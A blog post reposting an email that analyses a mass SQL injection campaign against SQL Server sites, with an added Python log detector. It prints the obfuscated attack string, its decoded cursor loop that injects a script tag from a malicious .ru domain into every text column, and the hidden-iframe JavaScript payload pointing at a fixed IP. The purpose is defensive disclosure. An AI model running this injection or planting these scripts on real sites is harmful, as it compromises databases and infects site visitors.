I have been reading a few blogs recently which have been issuing notices of the fact that they have been attacked with a SQL injection on their site. On a couple of sites I have been witnessing these attacks through Health Monitoring. At first I thought I had best not blog about it, due to the fact that some may take the SQL and use it for the wrong purposes, but then again, it is better that a finding is published so that others can do more to combat it and protect their sites and services. The following is an email which I recently sent to Rick Strahl in case the small amount of research I did may be of some use. I have now decided to publish the email on my blog, so it could be of potential help to others.
The Email
I have just read your latest blog post titled "Recent SQL Injection Attacks against Server." I would basically like to share something which I too have found from these attacks, which our servers are experiencing as well. Our attack looks remarkably similar to yours, see below:
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6F6A6E732E72752F6A732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--
Now what I did was simply copy the CAST part into a query to convert it so I could see what was being attempted. The one above, and the one which I think you are experiencing also, tries and in some cases succeeds in adding a JavaScript reference to all string fields in all tables of a database. You will see what I mean from below:
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.ojns.ru/js.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
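As an added example (not part of the original post or the email), here is the decoding step described above written as a small Python detector that a health-monitoring or log-review script could run over request lines: it unescapes the URL, pulls the hex out of CAST(0x... AS VARCHAR(n)), decodes it, and reports which markers of the hidden cursor loop are present. The sample log lines, the attacker.invalid domain and the function names are constructed for this example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Request-level signature of the attack above: SET @S=CAST(0x<hex> AS VARCHAR(n)) ... EXEC(@S)
CAST_HEX_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR\s*\(\s*\d+\s*\)\s*\)", re.IGNORECASE)
EXEC_RE = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.IGNORECASE)
# Markers of the decoded loop that stamps a script tag into every text column of every user table
INDICATORS = ("sysobjects", "syscolumns", "@@fetch_status", "<script")


def decode_cast_payload(request_line: str) -> Optional[str]:
    """Return the SQL hidden inside CAST(0x...) of a URL-encoded request, or None if absent."""
    decoded = unquote(request_line)
    m = CAST_HEX_RE.search(decoded)
    if not m or not EXEC_RE.search(decoded):
        return None
    hexstr = m.group(1)
    if len(hexstr) % 2:  # tolerate a clipped last nibble in a truncated log line
        hexstr = hexstr[:-1]
    return bytes.fromhex(hexstr).decode("latin-1")


def scan_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Flag lines carrying a hex-encoded EXEC payload: (index, decoded SQL, indicators found)."""
    hits = []
    for i, line in enumerate(lines):
        sql = decode_cast_payload(line)
        if sql is not None:
            hits.append((i, sql, [k for k in INDICATORS if k in sql.lower()]))
    return hits


# Constructed sample: a cut-down copy of the decoded loop with a placeholder domain, re-encoded as the attack does
_INJECTED_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name "
    "FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=167 OPEN Table_Cursor "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']="
    "RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://attacker.invalid/js.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_LOG = [  # constructed request lines; only the second one carries the payload
    "GET /products.aspx?id=42 HTTP/1.1 200",
    "GET /products.aspx?id=42;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + _INJECTED_SQL.encode("latin-1").hex() + "%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1 200",
    "GET /search.aspx?q=cast%20iron%20pan HTTP/1.1 200",
]

if __name__ == "__main__":
    for idx, sql, found in scan_log(SAMPLE_LOG):
        print(f"line {idx}: indicators={found}\n  {sql[:120]}...")
```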
I downloaded the js file and inside was the following:
document.write("<iframe src=http://91.203.93.4/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
After more investigation I have found that, although the domain name in the attack keeps changing, the IP address of the iframe in the js file does not seem to change:
document.write("<iframe src=http://91.203.93.4/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
Maybe this could be used to trace the culprit, who knows.
In the last week I have read and been informed of so many occurrences of a SQL injection attack with the same signature as this. I was reading an article recently released by Dan Kaminsky highlighting a massive flaw in DNS, one which enables individuals with the know-how to spoof actual DNS, raising phishing to a whole new level. I read it at this address: http://news.bbc.co.uk/1/hi/technology/7546557.stm
The reason, I suppose, that I thought of a connection between the two was that the robot is obviously using anonymous proxies to route the requests, but I also wondered whether www.ojns.ru in the attack SQL is achieved using this newly publicised DNS bug. I keep converting these attacks and the domain name which hosts the js file of the same name keeps changing; for example, another instance of the attack had this domain name: http://www.bgsr.ru/js.js . They all seem to be under a really crap alias of the union bank or something.
It would be great to find a way of really reversing this attack on the culprits.
Great post, and I hope it raises the issue of code security with many more developers.
Cheers,
Andrew Rea
Scott Hanselman talks about it here as well: http://www.hanselman.com/blog/CommentView.aspx?title=HackedAndIDidntLikeItURLScanIsStepZero
So, combining the above with what Rick Strahl and Scott Hanselman have done, there are some clear signs of actions that should be taken.
Hope this is of some help,
Cheers,
Andrew